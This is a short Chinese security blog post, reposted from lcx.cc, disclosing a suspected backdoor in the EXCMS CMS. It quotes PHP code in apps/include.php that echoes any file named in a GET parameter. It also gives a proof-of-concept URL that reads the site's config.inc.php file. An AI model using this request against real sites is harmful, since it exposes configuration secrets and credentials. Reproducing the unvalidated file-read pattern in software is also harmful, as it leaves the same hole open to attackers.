EXCMS 疑似再暴后门

admin 2021年4月3日19:35:55评论103 views字数 638阅读2分7秒阅读模式

某天遇到Excms的系统,官网http://www.excms.cn/

于GG搜索excms漏洞,发现 http://www.myhack58.com/Article/html/3/62/2011/28871.htm

分析中是作者明显藏有后门的漏洞

下载源码分析,很明显就能找到另一个疑似后门的漏洞(为什么说疑似?因为也不能确定,说不定就是有这样的程序员,呵呵。。)

漏洞文件:

apps/include.php

源码:

//加载系统配置文件
require_once('../configuration/inc/common.inc.php');

$file = $_GET['file'];
if($file!='' && file_exists(EXCMS_PATH.$file)){
        echo file_get_contents(EXCMS_PATH.$file);
}

不用看就知道了吧,呵呵。。。

利用:

http://www.xxxx.cn/apps/include.php?file=sitedata/config.inc.php

查看源码得:

文章来源于lcx.cc:EXCMS 疑似再暴后门

相关推荐: 【视频】网友调侃中石化天价酒单《我为祖国喝茅台》

网友调侃中石化天价酒单《我为祖国喝茅台》     【视频】网友调侃中石化天价酒单《我为祖国喝茅台》,我为祖国喝茅台,中石化,网友调侃。     不做评论,政府独裁、绝对垄断、极度腐败造就了中国的当前现状。 留言评论(旧系统): 我叫罗玉凤! @ 2011-04…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:35:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   EXCMS 疑似再暴后门https://cn-sec.com/archives/323781.html

发表评论

匿名网友 填写信息